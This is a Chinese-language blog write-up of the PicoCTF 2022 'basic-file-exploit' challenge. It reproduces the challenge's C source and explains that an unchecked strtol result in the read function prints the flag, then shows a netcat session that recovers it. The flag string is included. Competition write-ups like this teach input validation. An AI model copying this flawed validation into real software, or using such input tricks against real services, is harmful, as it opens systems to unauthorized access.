avatar

我可是会飞的啊

找对象ing

  • 首页
  • ctfs
  • 关于
  • 文件库
  • 留言板
  • 标签
  • 归档
  • 【网课推荐】(红队&二进制)
首页 [Pico CTF 2022]pwn-basic-file-exploit

[Pico CTF 2022]pwn-basic-file-exploit

Posted 29天前 Updated 29天前
[Pico CTF 2022]pwn-basic-file-exploit
By selph
11~14 min read

image​

题目分析

只给了个源码.c文件:应该只是逻辑问题

#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <stdint.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>

#define WAIT 60

// flag在全局变量里
static const char *flag = "[REDACTED]";

static char data[10][100];
static int input_lengths[10];
static int inputs = 0;

int tgetinput(char *input, unsigned int l)
{
  fd_set input_set;
  struct timeval timeout;
  int ready_for_reading = 0;
  int read_bytes = 0;

  if (l <= 0)
  {
    printf("'l' for tgetinput must be greater than 0\n");
    return -2;
  }

  /* Empty the FD Set */
  FD_ZERO(&input_set);
  /* Listen to the input descriptor */
  FD_SET(STDIN_FILENO, &input_set);

  /* Waiting for some seconds */
  timeout.tv_sec = WAIT; // WAIT seconds
  timeout.tv_usec = 0;   // 0 milliseconds

  /* Listening for input stream for any activity */
  ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
  /* Here, first parameter is number of FDs in the set,
   * second is our FD set for reading,
   * third is the FD set in which any write activity needs to updated,
   * which is not required in this case.
   * Fourth is timeout
   */

  if (ready_for_reading == -1)
  {
    /* Some error has occured in input */
    printf("Unable to read your input\n");
    return -1;
  }

  if (ready_for_reading)
  {
    read_bytes = read(0, input, l - 1);
    if (input[read_bytes - 1] == '\n')
    {
      --read_bytes;
      input[read_bytes] = '\0';
    }
    if (read_bytes == 0)
    {
      printf("No data given.\n");
      return -4;
    }
    else
    {
      return 0;
    }
  }
  else
  {
    printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
    return -3;
  }

  return 0;
}

static void data_write()
{
  char input[100];
  char len[4];
  long length;
  int r;

  printf("Please enter your data:\n");
  r = tgetinput(input, 100); 
  // Timeout on user input
  if (r == -3)
  {
    printf("Goodbye!\n");
    exit(0);
  }

  while (true)
  {
    printf("Please enter the length of your data:\n");
    r = tgetinput(len, 4);  // 数据长度手动输入可控
    // Timeout on user input
    if (r == -3)
    {
      printf("Goodbye!\n");
      exit(0);
    }

    if ((length = strtol(len, NULL, 10)) == 0)
    {
      puts("Please put in a valid length");
    }
    else
    {
      break;
    }
  }

  if (inputs > 10)
  {
    inputs = 0;
  }

  strcpy(data[inputs], input);    // 保存数据
  input_lengths[inputs] = length; // 保存数据长度

  printf("Your entry number is: %d\n", inputs + 1);
  inputs++;
}

static void data_read()
{
  char entry[4];
  long entry_number;
  char output[100];
  int r;

  memset(output, '\0', 100);

  printf("Please enter the entry number of your data:\n");
  r = tgetinput(entry, 4);
  // Timeout on user input
  if (r == -3)
  {
    printf("Goodbye!\n");
    exit(0);
  }

  if ((entry_number = strtol(entry, NULL, 10)) == 0)  // 如果不是数字,就会返回0,进入if,只要这里输入的是非数字即可
  {
    puts(flag);
    fseek(stdin, 0, SEEK_END);
    exit(0);
  }

  entry_number--;
  strncpy(output, data[entry_number], input_lengths[entry_number]); // 数据长度可控,会复制出多的内容,导致栈溢出,溢出的目标是全局变量flag,把output覆盖成flag,没有地址泄露,不可行
  puts(output);
}

int main(int argc, char **argv)
{
  char input[3] = {'\0'};
  long command;
  int r;

  puts("Hi, welcome to my echo chamber!");
  puts("Type '1' to enter a phrase into our database");
  puts("Type '2' to echo a phrase in our database");
  puts("Type '3' to exit the program");

  while (true)
  {
    r = tgetinput(input, 3);
    // Timeout on user input
    if (r == -3)
    {
      printf("Goodbye!\n");
      exit(0);
    }

    if ((command = strtol(input, NULL, 10)) == 0)
    {
      puts("Please put in a valid number");
    }
    else if (command == 1)
    {
      data_write();
      puts("Write successful, would you like to do anything else?");
    }
    else if (command == 2)
    {
      if (inputs == 0)
      {
        puts("No data yet");
        continue;
      }
      data_read();
      puts("Read successful, would you like to do anything else?");
    }
    else if (command == 3)
    {
      return 0;
    }
    else
    {
      puts("Please type either 1, 2 or 3");
      puts("Maybe breaking boundaries elsewhere will be helpful");
    }
  }

  return 0;
}

程序逻辑很奇怪,在写入数据的时候,竟然是人工输入数据长度,疑似在读取时存在栈溢出

本以为这里是要做栈溢出利用,然后发现是在读取函数里的逻辑会直接打印flag

就是在读取的时候,让你输入读取长度,这里输入个非十进制的字符即可拿到flag

漏洞利用

➜  pwn-basic-file-exploit nc saturn.picoctf.net 51109
Hi, welcome to my echo chamber!
Type '1' to enter a phrase into our database
Type '2' to echo a phrase in our database
Type '3' to exit the program
1
1
Please enter your data:
123123
123123
Please enter the length of your data:
6
6
Your entry number is: 1
Write successful, would you like to do anything else?
2
2
Please enter the entry number of your data:
a
a
picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0}

逆向调试
CTF pwn
This post is licensed under CC BY 4.0 by the author.
Share

Further Reading

Nov 30, 2023

[技能兴鲁2023 决赛 职工组]re-ezalgorithm

附件给了个exe,是pyinstaller打包的结果,没操作过这种程序,赛场上也没做出来,现在再来做一做(输在了没准备工具上) 环境准备 解包需要两个工具 pyinstxtractor.py:exe -> pyc github地址:extremecoders-re/pyinstxtractor: P

Nov 7, 2023

[Pico CTF 2022]pwn-basic-file-exploit

题目分析 只给了个源码.c文件:应该只是逻辑问题 #include <stdio.h> #include <stdlib.h> #include <stdbool.h> #include <string.h> #include <stdint.h> #include <ctype.h> #inclu

Nov 7, 2023

[Pico CTF 2021]pwn-Unsubscriptions Are Free

题目分析 给出了程序和源码 ➜ pwn-Unsubscriptions Are Free pwn checksec vuln [*] '/home/selph/Downloads/PicoCTF/pwn-Unsubscriptions Are Free/vuln' Arch: i3

OLDER

[Pico CTF 2021]pwn-Unsubscriptions Are Free

NEWER

[技能兴鲁2023 决赛 职工组]re-ezalgorithm

Recently Updated

  • 【置顶】本博客的使用指南&更新计划(2023.3更新)
  • [技能兴鲁2023 决赛 职工组]re-ezalgorithm
  • [Pico CTF 2022]pwn-basic-file-exploit
  • [Pico CTF 2021]pwn-Unsubscriptions Are Free
  • [Pico CTF 2021]pwn-Here's a Libc

Trending Tags

pwn 符号执行 HEVD学习 .NET逆向 病毒分析 CTF 软件安全 《Windows内核编程》 dll注入 树莓派

Contents

©2023 我可是会飞的啊. Some rights reserved.

Using the Halo theme Chirpy